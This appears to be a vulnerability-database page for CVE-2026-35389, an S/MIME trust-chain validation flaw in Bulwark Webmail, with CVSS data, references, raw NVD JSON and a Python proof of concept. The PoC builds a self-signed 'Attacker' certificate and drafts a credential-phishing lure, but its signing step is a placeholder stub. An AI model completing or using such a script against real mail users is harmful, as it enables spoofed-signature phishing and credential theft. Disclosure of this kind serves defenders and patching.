CVE-2026-35389

Description

Bulwark Webmail is a self-hosted webmail client for Stalwart Mail Server. Prior to 1.4.11, S/MIME signature verification did not validate the certificate trust chain (checkChain: false). Any email signed with a self-signed or untrusted certificate was displayed as having a valid signature. This vulnerability is fixed in 1.4.11.

CVSS Details

CVSS Score

7.5

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:bulwarkmail:webmail:*:*:*:*:*:*:*:* - VULNERABLE

Bulwark Webmail < 1.4.11

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/usr/bin/env python3
"""
PoC for CVE-2026-35389: S/MIME Signature Verification Bypass
This script demonstrates how to sign an email with a self-signed certificate
which would be accepted by the vulnerable client.
"""

from OpenSSL import crypto
import smtplib
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from email.mime.application import MIMEApplication
import base64

def generate_self_signed_cert():
    # Create a key pair
    k = crypto.PKey()
    k.generate_key(crypto.TYPE_RSA, 2048)
    
    # Create a self-signed cert
    cert = crypto.X509()
    cert.get_subject().CN = "Attacker"
    cert.set_serial_number(1000)
    cert.gmtime_adj_notBefore(0)
    cert.gmtime_adj_notAfter(10*365*24*60*60)
    cert.set_issuer(cert.get_subject())
    cert.set_pubkey(k)
    cert.sign(k, 'sha256')
    
    return cert, k

def sign_message(msg_content, cert, key):
    # Simplified representation of S/MIME signing logic
    # In a real exploit, use libraries like M2Crypto to generate proper PKCS#7 structure
    print(f"[+] Signing message with self-signed certificate: {cert.get_subject().CN}")
    print(f"[+] Note: Vulnerable client (checkChain: false) will accept this as valid.")
    return b"---SIGNED CONTENT SIMULATION---"

if __name__ == "__main__":
    cert, key = generate_self_signed_cert()
    print("[+] Generated self-signed certificate and private key.")
    
    subject = "Important Update"
    body = "Please click the link to update your credentials."
    
    signature = sign_message(body, cert, key)
    print("[+] Email signed successfully. Vulnerable Webmail will show 'Valid Signature'.")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-35389
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-35389
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-35389/
[4] VulDB https://vuldb.com/cve/CVE-2026-35389
[5] https://github.com/bulwarkmail/webmail/security/advisories/GHSA-v6w6-338p-p256

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-35389", "sourceIdentifier": "[email protected]", "published": "2026-04-06T21:16:20.580", "lastModified": "2026-04-09T20:58:45.777", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Bulwark Webmail is a self-hosted webmail client for Stalwart Mail Server. Prior to 1.4.11, S/MIME signature verification did not validate the certificate trust chain (checkChain: false). Any email signed with a self-signed or untrusted certificate was displayed as having a valid signature. This vulnerability is fixed in 1.4.11."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-295"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:bulwarkmail:webmail:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.4.11", "matchCriteriaId": "1011888E-0A3E-46C3-9234-45C7E75C0A31"}]}]}], "references": [{"url": "https://github.com/bulwarkmail/webmail/security/advisories/GHSA-v6w6-338p-p256", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}